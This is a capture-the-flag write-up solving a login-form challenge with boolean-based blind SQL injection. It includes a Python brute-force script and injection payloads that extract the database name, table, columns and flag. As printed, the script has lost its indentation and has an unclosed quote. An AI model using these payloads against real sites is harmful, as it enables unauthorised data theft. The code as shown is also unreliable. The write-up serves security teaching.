![b92891152de71b64fe8c98b10dd9d5e9.png](a0d32edf2beb46fe986bd6fc95f03dc5.png)
We're given a login form with nothing else to go on.
Testing the form, we get different errors based on what we enter
`admin:password` = `The password you entered was not valid`
`admin':password` = nothing
`admin'-- :password` = `The password you entered was not valid`
Looks like boolean based blind SQLi
Using this script, we're able to pull the database name:
```
import requests
import string
url = 'http://c0ntrol.threatsims.com:8888/'
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
}
found_chars = '
while True:
for i in string.printable:
data = {
"username":f"admin' AND substring(database(),1,{len(found_chars) + 1})='{found_chars + i}'#",
"password":"as",
"submit":""
}
print('Trying ' + found_chars + i)
r = requests.post(url, data=data, headers=headers)
if 'The password you entered was not valid.' in r.text:
print('Hit ' + i)
found_chars += i
break
```
The database name is **ecorpdb**
To get the table(s), we can use this injection in our script:
```
username":f"admin' AND (substr((select table_name from information_schema.tables where table_schema='ecorpdb' limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#
```
Table name is **users**
To get the columns, we can use this injection in our script:
```
"username":f"admin' AND (substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
```
columns are **flag**, **id** and **password**
To get the data out of the columns, we can use this injection in our script:
```
"username":f"admin' AND (substr((select flag from users limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
```
Give us the flag
`flag{g00d_ol_l0gin_sqli}`
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #sqli #boolean-blind
Related: